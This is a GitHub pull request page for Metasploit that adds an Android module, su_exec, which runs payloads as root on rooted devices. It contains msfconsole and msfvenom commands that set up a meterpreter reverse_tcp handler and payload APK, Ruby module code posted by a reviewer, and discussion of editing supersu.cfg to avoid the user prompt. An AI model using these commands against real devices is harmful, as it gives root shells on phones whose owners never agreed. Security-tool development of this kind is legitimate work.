Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add an Android module to run payloads with su on a rooted device #10012

Merged
merged 5 commits into from Mar 7, 2019

Conversation

Projects
None yet
6 participants
@timwr
Copy link
Contributor

timwr commented May 12, 2018

This is a quick module that allows you to run payloads with the /system/xbin/su binary present on a rooted Android device. This effectively works a local root exploit but may require the user to grant permission.

Verification

List the steps needed to make sure this thing works

  • Get a normal Android meterpreter session: e,g:
  • msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; setg lhost LHOST; set lport 4444; set ExitOnSession false; run -j"
  • msfvenom -p android/meterpreter/reverse_tcp LHOST=LHOST LPORT=4444 -o meterpreter.apk
  • ...
  • Use the module, e.g:
msf5 exploit(multi/handler) > use exploit/android/local/su_exec
msf5 exploit(android/local/su_exec) > set payload linux/aarch64/meterpreter/reverse_tcp
payload => linux/aarch64/meterpreter/reverse_tcp
msf5 exploit(android/local/su_exec) > set SESSION -1
SESSION => -1
msf5 exploit(android/local/su_exec) > set LHOST LHOST
LHOST => LHOST
msf5 exploit(android/local/su_exec) > set LPORT 4433
LPORT => 4433
msf5 exploit(android/local/su_exec) > run
  • Verify you get a working linux meterpreter session as uid 0
  • Verify the existing Android session is still working
  • Document the thing and how it works (Example)
@timwr

This comment has been minimized.

Copy link
Contributor Author

timwr commented May 12, 2018

You might find this module useful for testing #9964 and #9956

@Auxilus

This comment has been minimized.

Copy link
Contributor

Auxilus commented May 12, 2018

nice work @timwr

@timwr

This comment has been minimized.

Copy link
Contributor Author

timwr commented May 12, 2018

This is definitely worth discussing, but the way I saw it was you would use this module (or any other root exploit) to gain a new meterpreter/shell session as root, and (post/gather) modules that require root would use the root session (and fail if they were run on a non root session).

@Auxilus

This comment has been minimized.

Copy link
Contributor

Auxilus commented May 13, 2018

yeah, makes sense.that way the post modues won't need to specify the SU_BINARY at all?

@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented May 13, 2018

A few (untested) suggestions:

  include Msf::Post::File
  include Msf::Post::Android::Priv
  def base_dir
    datastore['WritableDir'].to_s
  end

  def su_bin
    datastore['SU_BINARY'].to_s
  end

  def exploit
    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    unless file_exist? su_bin
      fail_with Failure::BadConfig, "#{su_bin} does not exist"
    end

    unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    linemax = 4088 - su_bin.size
    execute_cmdstager({
      flavor: :echo,
      enc_format: :octal,
      prefix: '\\\\0',
      temp: base_dir,
      linemax: linemax,
      background: true,
    })
  end
@Auxilus

This comment has been minimized.

Copy link
Contributor

Auxilus commented May 13, 2018

stupid question

about the prompt :

/data/data/eu.chainfire.supersu/files/supersu.cfg holds the priv config for apps

if we try to over write it to set access=2 for [com.metasploit.stage] will it go through the existing list and then execute the command (which will lead to giving user prompt) or will it first execute the command?

@timwr

This comment has been minimized.

Copy link
Contributor Author

timwr commented Aug 19, 2018

Apologies for losing track of this one.
@bcoles I've added a is_root check but we can't really check whether the temporary directory is writable without executing su (it's not writable from within the app sandbox) and each execution of su may produce a alert to the user (so it's better to do it only once).
@Auxilus as discussed, we could totally patch supersu.cfg if we have root access already, but not without root which makes it less useful.

@Auxilus

This comment has been minimized.

Copy link
Contributor

Auxilus commented Aug 19, 2018

gotcha

@timwr

This comment has been minimized.

Copy link
Contributor Author

timwr commented Oct 1, 2018

I've added some documentation but while testing I've come across a strange bug with cmd_exec not returning :(

@timwr timwr added delayed and removed needs-docs labels Oct 1, 2018

@timwr timwr force-pushed the timwr:su_exec branch from a598943 to b16ccae Oct 1, 2018

@timwr timwr force-pushed the timwr:su_exec branch from b16ccae to dea3f90 Oct 1, 2018

@wchen-r7 wchen-r7 removed the delayed label Oct 17, 2018

@wchen-r7 wchen-r7 self-assigned this Oct 17, 2018

@wchen-r7 wchen-r7 added the module label Oct 17, 2018

@busterb busterb self-assigned this Mar 7, 2019

@busterb busterb merged commit dea3f90 into rapid7:master Mar 7, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

busterb added a commit that referenced this pull request Mar 7, 2019

@busterb

This comment has been minimized.

Copy link
Contributor

busterb commented Mar 7, 2019

Release Notes

The android/local/su_exec exploit module has been added to the framework. This module runs payloads with escalated privileges on rooted Android devices.

msjenkins-r7 added a commit that referenced this pull request Mar 7, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.